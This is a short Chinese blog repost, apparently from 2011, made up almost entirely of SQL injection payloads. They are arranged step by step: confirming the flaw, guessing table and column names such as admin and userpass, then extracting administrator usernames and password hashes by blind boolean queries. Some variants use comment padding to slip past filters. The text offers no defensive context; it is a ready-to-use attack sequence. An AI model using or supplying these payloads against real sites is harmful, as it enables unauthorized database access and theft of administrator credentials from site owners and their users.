检查漏洞
1' or 1=1 or ('1' = '1
1' or 1=1) or '1' = '1
1' or 1=1 or '1' = '1
1'/**/or/**/1=1/**/or/**/'1'= '1
猜表名
1' or 0<(select count(*) from admin) and '1' = '1
1'/**/or/**/0<(select/**/count(*)/**/from/**/user)/**/and/**/'1'='1
1'/**/or/**/0<(select/**/count(*)/**/from/**/guanliyuan)/**/and/**/'1'='1
猜列名
1' or 0<(select top 1 count(*) from admin where len(id)>0) and '1' = '1
1' or 0<(select top 1 count(*) from admin where len(name)>0) and '1' = '1
1' or 0<(select top 1 count(*) from admin where len(username)>0) and '1' = '1
猜帐号
1' or 1<(select top 1 count(*) from admin where len(name)>3 and id =1) and '1' = '1
1' or 1<(select top 1 count(*) from admin where name = 'XXX' ) and '1' = '1
猜帐号
1' or 1=1 and (select top 1 abs(asc(mid(name,1,1))) from admin)>12635 and '1' = '1
1' or 1<(select top 1 count(*) from admin where len(userpass)=16) and '1' = '1
1' or 1<(select top 1 count(*) from admin where id > 1 and len(userpass)>0) and '1' = '1
1' or 1<(select top 1 count(*) from admin where userpass like '321665453993bc2a') and '1' = '1
1' or 0<(select top 1 count(*) from admin where id = 3) and '1' = '1 正确
1' or 0<(select top 1 count(*) from admin where id = 3 and name = 'XXX') and '1' = '1
1' or 0<(select top 1 count(*) from admin where id = 3 and name = 'XXX' and userpass = '123665453993bc2a') and '1' = '1
本文转自黄聪博客园博客,原文链接:http://www.cnblogs.com/huangcong/archive/2011/07/16/2108073.html,如需转载请自行联系原作者
